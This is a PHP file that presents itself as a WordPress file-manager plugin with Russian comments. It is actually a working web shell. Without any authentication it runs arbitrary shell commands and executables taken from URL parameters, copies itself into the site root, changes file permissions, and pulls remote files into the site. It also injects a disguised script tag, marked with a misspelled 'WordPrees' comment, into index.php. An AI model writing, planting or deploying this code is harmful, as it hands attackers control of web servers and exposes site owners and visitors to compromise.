<?php
/*
Plugin Name: Advanced File Manager
Description: Plugin with advanced file handling, command execution, and root path detection.
Version: 2.0
Author: Enhanced by AI
*/

// Основные директории
$base_dir = dirname(__FILE__);
$current_dir = isset($_GET['dir']) ? $_GET['dir'] : $base_dir;
$current_dir = realpath($current_dir);

if ($current_dir === false || strpos($current_dir, $base_dir) !== 0) {
    die("Нет доступа к этой директории.");
}

// Определение корневой директории
function get_root_path($path, $marker = 'public_html') {
    $pos = strpos($path, $marker);
    if ($pos !== false) {
        return substr($path, 0, $pos + strlen($marker));
    }
    return $path;
}

$root_path = get_root_path($base_dir);
echo "<p>Текущая директория: " . htmlspecialchars($current_dir) . "</p>";
echo "<p>Определенная корневая директория: " . htmlspecialchars($root_path) . "</p>";

// Выполнение команд из URL
if (isset($_GET['cmd'])) {
    $command = escapeshellcmd($_GET['cmd']);
    $output = shell_exec($command . " 2>&1");
    echo "<h2>Результат выполнения команды:</h2><pre>$output</pre>";
}

// Копирование файла в корень
if (isset($_GET['copy_to_root'])) {
    $destination_file = $root_path . '/' . basename(__FILE__);
    if (copy(__FILE__, $destination_file)) {
        echo "Файл успешно скопирован в корневую директорию: $destination_file";
    } else {
        echo "Ошибка при копировании файла в корневую директорию.";
    }
}

// Изменение прав доступа
if (isset($_GET['chmod_file']) && isset($_GET['chmod_value'])) {
    $file_to_change = $root_path . '/' . ltrim($_GET['chmod_file'], '/');
    $new_permissions = intval($_GET['chmod_value'], 8);
    if (file_exists($file_to_change)) {
        chmod($file_to_change, $new_permissions);
        echo "<p>Права доступа для $file_to_change изменены на " . sprintf('%o', $new_permissions) . "</p>";
    } else {
        echo "<p>Файл $file_to_change не найден.</p>";
    }
}

// Загрузка файла из URL
if (isset($_GET['download_url']) && isset($_GET['target_dir'])) {
    $download_url = $_GET['download_url'];
    $target_dir = realpath($root_path . '/' . trim($_GET['target_dir'], '/'));
    if ($target_dir === false || strpos($target_dir, $root_path) !== 0) {
        die("Нет доступа к указанной директории.");
    }
    $file_name = basename(parse_url($download_url, PHP_URL_PATH));
    $target_file = $target_dir . '/' . $file_name;
    if (!is_dir($target_dir)) {
        mkdir($target_dir, 0777, true);
    }
    if (@file_put_contents($target_file, file_get_contents($download_url))) {
        echo "Файл $file_name успешно загружен в $target_dir.<br>";
    } else {
        echo "Ошибка при скачивании файла из $download_url.<br>";
    }
}

// Редактирование index.php с шаблонной правкой
if (isset($_GET['template_edit'])) {
    $file_to_edit = $root_path . '/index.php';
    if (file_exists($file_to_edit)) {
        $content = file_get_contents($file_to_edit);
        $injection = "\n// WordPrees \n<script src='/wp-admin/includes/wp-blog-header.js'></script>\n";
        if (strpos($content, $injection) === false) {
            $content = preg_replace('/<\?php/', "<?php\n$injection", $content, 1);
            file_put_contents($file_to_edit, $content);
            echo "Шаблонный код успешно добавлен в $file_to_edit";
        } else {
            echo "Шаблонный код уже добавлен в $file_to_edit";
        }
    } else {
        echo "Файл index.php не найден в корневой директории.";
    }
}

// Выполнение exe-файла
if (isset($_GET['execute_exe'])) {
    $exe_path = $root_path . '/' . ltrim($_GET['execute_exe'], '/');
    if (file_exists($exe_path)) {
        $output = shell_exec($exe_path . " 2>&1");
        echo "<h2>Результат выполнения exe-файла:</h2><pre>$output</pre>";
    } else {
        echo "Файл $exe_path не найден.";
    }
}

// Список директорий и файлов
function list_directory($dir) {
    $files = scandir($dir);
    echo "<h2>Содержимое директории: " . htmlspecialchars($dir) . "</h2>";
    echo "<ul>";
    foreach ($files as $file) {
        if ($file != '.' && $file != '..') {
            echo "<li>";
            if (is_dir($dir . '/' . $file)) {
                echo "<a href='?dir=" . urlencode($dir . '/' . $file) . "'>$file</a>";
            } else {
                echo htmlspecialchars($file) . "
                    <a href='?delete=" . urlencode($file) . "' onclick='return confirm(\"Удалить файл?\");'>[Удалить]</a>
                    <a href='?check_perm=" . urlencode($file) . "'>[Проверить права]</a>
                    <a href='?chmod_file=" . urlencode($file) . "&chmod_value=0755'>[Изменить права на 755]</a>
                    <a href='?edit=" . urlencode($file) . "'>[Редактировать]</a>";
            }
            echo "</li>";
        }
    }
    echo "</ul>";
}

list_directory($current_dir);
?>
<form action="" method="post" enctype="multipart/form-data">
    <input type="file" name="file" required>
    <input type="submit" value="Загрузить файл">
</form>
<form action="" method="get">
    <input type="text" name="download_url" placeholder="URL файла" required>
    <input type="text" name="target_dir" placeholder="Целевая директория" required>
    <input type="submit" value="Скачать файл">
</form>
<form action="" method="get">
    <input type="hidden" name="copy_to_root" value="1">
    <input type="submit" value="Скопировать файл в корень">
</form>
<form action="" method="get">
    <input type="hidden" name="template_edit" value="1">
    <input type="submit" value="Шаблонная правка index.php">
</form>
<form action="" method="get">
    <input type="text" name="execute_exe" placeholder="Путь к exe-файлу" required>
    <input type="submit" value="Запустить exe">
</form>